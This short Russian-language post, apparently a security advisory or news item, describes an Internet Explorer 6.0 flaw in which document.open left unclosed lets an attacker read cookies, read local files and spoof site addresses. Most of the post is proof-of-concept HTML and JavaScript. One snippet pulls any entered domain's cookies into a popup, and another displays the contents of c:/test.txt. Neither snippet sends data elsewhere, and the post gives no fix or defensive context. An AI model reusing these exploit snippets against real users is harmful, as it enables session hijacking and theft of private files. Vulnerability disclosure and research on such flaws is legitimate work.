Простое открытие (document.open) документа без
его закрытия (document.close) позволяет атакующему
читать куки, читать локальные файлы,
подделывать адреса сайтов.

Уязвимая система: Internet Explorer 6.0

Примеры

Читаем произвольные куки:

<script>
function showcookie()
{
var domainname = document.forms.domainStuff.domainname.value; 
y = document.open(«http://»+domainname, «x», «width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes» );

setTimeout(‘alert(y.document.cookie);y.document.close();’,5000);

}

</script>

<form name=»domainStuff»>
<input type=text name=»domainname» size=50>
<input type=button value=»Click to view cookie»
onclick=»javascript:showcookie()»>

Читаем файл:

<script>

var y = document.open( «c:/test.txt», «x», «width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes» );
setTimeout(‘alert(y.document.body.innerHTML);y.document.close();’,1000);

</script>



Оставить мнение